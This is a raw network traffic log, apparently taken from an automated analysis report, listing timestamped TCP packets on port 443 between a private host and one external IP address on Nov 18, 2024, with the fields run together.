                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.871825933 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.871896982 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.871948957 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.871948957 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.871969938 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.872019053 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911453962 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911521912 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911564112 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911576033 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911588907 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911631107 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911649942 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911700964 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911875963 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911875963 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911884069 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911940098 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912204027 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912245035 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912302971 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912311077 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912337065 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912430048 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912915945 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912956953 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.913080931 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.913080931 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.913089991 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.913146973 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.961273909 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.961344004 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.961447001 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.961447001 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.961466074 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.961556911 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.021403074 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.021459103 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.021641016 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.021641016 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.021660089 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.022038937 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.030360937 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.030409098 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268292904 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268300056 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268727064 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268749952 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268825054 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268825054 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268832922 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268946886 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317159891 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317197084 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317270041 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317281008 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317317963 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317353010 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317375898 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317385912 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317404985 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317441940 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317461967 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.376924038 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.376960039 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.377043962 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.377057076 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.377095938 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.377171040 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.386502028 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.386553049 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.386670113 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.386670113 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.386692047 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.386934042 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387130976 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387177944 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387195110 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387209892 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387334108 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387334108 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387487888 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387533903 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387614965 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387614965 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387624025 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387680054 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.388211966 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.388254881 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.388277054 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.388283968 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.388367891 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.435738087 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.435772896 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.435846090 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.435857058 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.435899973 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.435914993 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.496023893 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.742280006 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.742392063 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.742392063 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.742410898 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743659019 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743707895 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743724108 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743741989 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743748903 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743777037 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743796110 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743804932 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743804932 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743813992 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743827105 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743855953 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743865013 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743874073 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743891954 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743927956 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744079113 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744096041 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744148970 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744157076 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744256020 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744615078 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744637012 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744700909 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744709969 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793037891 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793102026 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793189049 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793210030 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793229103 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793268919 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793282032 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793323040 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793332100 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793358088 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793373108 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793395996 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.841598988 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852152109 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852180958 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852240086 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852282047 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852296114 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852319002 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852339983 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852387905 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.860919952 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.860966921 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.861026049 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.861035109 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.861078024 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.030869007 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.030941963 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.031040907 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.031061888 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.031119108 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.031136990 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.058562994 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.058617115 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.058695078 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.058713913 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.058748960 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.058757067 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.098155975 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.098211050 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.098332882 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.098347902 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.098380089 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.098407030 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.099692106 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.099735975 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.099771023 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.099777937 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.099807024 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.099828005 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.099906921 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.099926949 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.099967003 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.099972963 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.100002050 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.100023031 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.100369930 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.100433111 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.100433111 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.100449085 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.100483894 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.100910902 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.100979090 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.100979090 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.100992918 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.101041079 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.101228952 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.101249933 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.101289988 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.101296902 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.101320028 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.101341009 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.149102926 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.149127960 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.149349928 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.149405956 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.149425983 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.149436951 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.149460077 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.149477959 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.193607092 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.338258028 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.338320971 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.338330030 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.338371038 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.338644028 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.338660002 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.338716030 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.338722944 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.338752031 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.338768959 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.339035034 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.339051008 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.339114904 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:21.339123011 CET44349731198.252.105.91192.168.2.10
